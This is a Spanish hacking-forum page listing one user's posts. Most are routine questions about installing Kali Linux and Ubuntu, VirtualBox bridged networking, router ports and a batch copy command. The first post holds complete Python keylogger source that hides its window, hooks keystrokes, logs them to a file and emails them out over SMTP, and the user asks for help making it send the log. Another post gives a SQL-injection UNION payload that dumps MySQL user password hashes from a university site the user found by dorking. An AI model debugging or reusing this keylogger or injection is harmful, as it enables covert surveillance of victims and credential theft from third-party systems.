elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Temas
Páginas: [1]
1  Programación / Scripting / Problema con Keylogger en Python (No envía el log) en: 10 Abril 2019, 00:13 am
Estoy empezando en el mundo de Python y he decidido seguir este pequeño tutorial para hacer un simple Keylogger que envía las capturas al correo electrónico: http://www.pythondiario.com/2017/05/como-crear-un-keylogger-remoto-con.html

El problema viene cuando al alcanzar los caracteres establecidos para que se envíe el log a mi correo, llega un correo vacío, sin asunto, solo con la palabra "capturado"

Adjunto código:

Código
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3.  
  4. import win32console
  5. import win32gui
  6. import pythoncom,pyHook
  7. import time
  8. import smtplib
  9. import os
  10. import sys
  11. # www.pythondiario.com
  12.  
  13. ########################################################
  14. # CONFIGURAR VARIABLES
  15. ########################################################
  16.  
  17. win = win32console.GetConsoleWindow()
  18. win32gui.ShowWindow(win,0)
  19.  
  20. #crea el archivo .txt
  21. f=open("c:\output.txt","w+")
  22. f.close
  23.  
  24. #Variable que cuenta las tecas presionadas
  25. count = 0
  26.  
  27. ########################################################
  28. # FUNCIONES
  29. ########################################################
  30.  
  31. def send_email(message):
  32.  
  33.    try:
  34.  
  35.        # Datos
  36.        fromaddr = 'correo@gmail.com'
  37.        toaddrs = 'correo@gmail.com'
  38.        username = 'correo@gmail.com'
  39.        password = 'contraseña'
  40.  
  41.        # Enviando el correo
  42.        server = smtplib.SMTP('smtp.gmail.com:587')
  43.        server.starttls()
  44.        server.login(username,password)
  45.        server.sendmail(fromaddr, toaddrs, message)
  46.        server.quit()
  47.  
  48.    except:
  49.  
  50.        pass
  51.  
  52.  
  53. def OnKeyboardEvent(event):
  54.  
  55.    global count
  56.    count += 1
  57.    #presiona CTRL+E para salir
  58.    if event.Ascii==5:
  59.        sys.exit(0)
  60.  
  61.    if event.Ascii !=0 or 8:
  62.        #abre output.txt
  63.        f=open('c:\output.txt','r+')
  64.        buffer=f.read()
  65.        f.close()        
  66.  
  67.        if len(buffer)==1:
  68.            send_email("Arranco...")            
  69.  
  70.        if  count ==100:
  71.            #Envia los ultimos 500 caracteres
  72.            capturado = buffer[-100:].replace("\n"," ")
  73.            send_email("capturado")
  74.            count = 0
  75.  
  76.        #abre output.txt escribe y suma nuevas pulsaciones
  77.        f=open('c:\output.txt','w')
  78.        keylogs=chr(event.Ascii)
  79.  
  80.        #si se presiona ENTER
  81.        if event.Ascii==13:
  82.            keylogs='\n'
  83.  
  84.        #si se preciona ESPACIO
  85.        if event.Ascii==32:
  86.            keylogs=''
  87.  
  88.        buffer+=keylogs
  89.        f.write(buffer)
  90.        f.close()
  91.  
  92.  
  93. # crea el objeto hook manager
  94. hm = pyHook.HookManager()
  95. hm.KeyDown = OnKeyboardEvent
  96. # set the hook
  97. hm.HookKeyboard()
  98. # wait forever
  99. pythoncom.PumpMessages()


Del código original de la web, he modificado 'elif' por 'if' pues de lo contrario ni me envía el mensaje, '(capturado)' por '("capturado")', y he reducido el envío de fichero a la pulsación de 100 caracteres. Bueno y he cambiado el correo y la contraseña por motivos evidentes. ¿Sabéis que está fallando? Mil gracias de antemano :huh:
2  Seguridad Informática / Hacking Wireless / Problema de conexión virtualbox. (activation of network connection failed) en: 5 Abril 2019, 21:29 pm
Buenas a todos, resulta que estoy configurando una máquina virtual con Kali Linux y he seguido esta guía para integrarla en la red local: https://geekland.eu/integrar-maquina-virtual-en-una-red-local/

El problema viene que al habilitar el adaptador de red>Conectado a: Adaptador puente>nombre:wlan0 (en mi caso salen otras opciones de las cuales he optado por "1x1 11bgn Wireless LAN PCI Express Half Mini Card Adapter" me salta un error al encender la máquina [Activation of Network connection failed] con el cual no se me asigna la ip privada de la red física, y evidentemente no tengo conexión. Solo volviendo a ponerlo en "Conectado a: NAT" vuelve a funcionar pero claro, con la ip virtual de la máquina. Alguien sabe que falla y que solución tiene? Gracias de antemano! :huh



Actualizo: No sabría decir cómo, pero se ha solucionado el problema de conexión y ya funciona perfectamente!
3  Sistemas Operativos / GNU/Linux / Kali Linux ERROR DE INSTALACIÓN! en: 8 Septiembre 2015, 23:00 pm
Hola a todos,
Recientemente me he descargado la ISO de Kali de 32 bits en mi Pc y la he quemado en un cd con cdburnerxp (si no me equivoco se escribe así).He cambiado los ajustes en mi BIOS para que arranque el CD en primer lugar y eso todo...Completé la instalación, y sustituí mi Windows Vista (todo un alivio jaja) por mi Kali. La cosa al parecer salió bien,la instalación se dio por completada y me hizo un GRUB también ya para acabar.El problema viene cuando arranco la PC que empieza a hacer sus arranques y comprobaciones y una de estas sale "FAILED",cuando acaba todo me pide el login y nada más intentas reaccionar para escribir desaparece todo y se queda todo en negro con una pequeña línea blanca parpadeante en la esquina superior izquierda esperando algo (que nunca llega)

Como se que muchos estarán perdidos,no entendieron, o quieren saber donde está el error ,hice un vídeo mostrando todo el proceso de arranque.

PD:He reinstalado Kali y el resultado es el mismo
PD(2): He intentado iniciar desde el Live y no me deja tampoco
Datos del PC (Laptop):
Acer Aspire 5632WLMi
Intel Core Duo processor T5200 (1.60 Ghz,533Mhz FSB 2MB L2 cache)
Up to 384MB NVIDIA GeForce Go 7300 TurboCache
160GB HDD
DVD-Super Multi Double layer
1GB DDR2
802.11a/b/g wireless LAN

Actualización: También decir que después de una larga espera con la línea blanca aparece esto:
Aclarar que es el Windows Vista dañado (en otras ocasiones se ve mejor).También aclarar que el Windows Vista tenía que estar borrado según el Graphical install de kali
4  Sistemas Operativos / GNU/Linux / ¿Como instalar dos Sistemas operativos y eliminar el anterior? en: 6 Septiembre 2015, 20:41 pm
Hola a todo el foro:

Tengo Windows Vista en mi PC y querría desinstalarlo para instalar Debian y Kali Linux en éste.

¿Como procedo para eliminar Vista?(Quiero borrar tdos los archivos de mi PC, así que formatear no sería un problema)
¿Instalo primero Debian y luego hago una partición?

Perdón si parece un tema muy visto, pero hacer todas estas cosas me ha revelto la cabeza. Gracias por vuestra paciencia
5  Seguridad Informática / Nivel Web / ¿Porque no se descifra este hash? en: 1 Septiembre 2015, 12:41 pm
Haciendo Google Dorks me encontré esta web de una Universidad vulnerable a SQL INJECTION.
He intentado descifrar los hashes que aparecen pero no lo consigo! No es MD5 o SHA1?

http://www.xxx./xxx/noticias.php?id=1947+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2+FROM+mysql.user--

Mod: No poner enlaces a paginas vulnerables directamente.

6  Sistemas Operativos / GNU/Linux / Mi PC es compatible con Kali Linux? en: 28 Agosto 2015, 20:30 pm
Escribo esto porque me va a explotar la cabeza.
Tengo un Acer Aspire 5632WLMi con un Intel Core 2 Duo processor T5200
Ya tiene sus añitos...
Se podría instalar Kali Linux en él?
Kali tiene unos requisitos de hardware y me lié muchísimo con los tipos de arquitectura así que si alguien sabe resolvermelo...
En caso de que la respuesta sea negativa... Se podría arrancar desde un livecd o un usb booteable?
Gracias de antemano y perdón por la sencillez de la duda...
7  Seguridad Informática / Hacking Wireless / Como abrir puerto 23? en: 16 Agosto 2015, 23:21 pm
Hola a todos los usuarios,
Resulta que he estado haciendo pruebas de pentesting a un router Thomson (de mi propia red wifi), y escaneado los puertos abiertos solo se encuentra el 80.

Logro acceder a la página de configuración del router con los datos por defecto.

Esta es la página de configuración del router (192.168.0.1):



Me dirijo al apartado Forwarding donde puedo abrir los puertos:

Como pueden observar pongo que se abran todos los puertos desde el 1 al 80 tanto para el protocolo TCP como para el UDP. Hice los dos por separado porque muchas veces el Both da problemas.
Una vez guardado esto, me dispongo a volver a pasar el escaner de puertos pero sigue detectando sólo el puerto 80. ¿Qué ocurre? ¿Alguna idea? :huh:
8  Sistemas Operativos / GNU/Linux / Duda sencilla: Instalar Ubuntu en USB una vez arrancado el PC desde éste. en: 14 Enero 2015, 22:16 pm
Cuando arranco desde éste me sale un menú de UNetbootin, pues lo instalé con éste, y en el menu salen varias opciones.
Dejo imagen:


Yo de momento entré en ''Try Ubuntu without installing''  para probarlo y bien.

Quiero descargar ya el Ubuntu en mi USB definitivamente (Install Ubuntu), pero tengo el miedo de que se instale en mi Disco Duro y no en el USB, pues cuando inicias la instalación no te pide ubicación.

Supongo que como lo estoy arrancando desde el USB no tiene otro lugar donde instalarlo no?

Se está instalando en el USB?

Muchas gracias de antemano a todo el foro. Cualquier aportación por pequeña que sea será de gran ayuda.  :)
9  Programación / Scripting / ¿Cual es el error que estoy cometiendo en este comando de batch? [BATCH] en: 12 Enero 2015, 17:49 pm
Quiero copiar todos los archivos .pdf de mi pc a mi pendrive (Unidad extraíble F:), pero me sale que no encuentra el archivo especificado.
Código:
C:
copy *.pdf  F:
pause

He probado con otros que he encontrado en internet pero; o no sucede nada o me ocurre lo mismo.

Muchas gracias de antemano a cualquier aportación.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines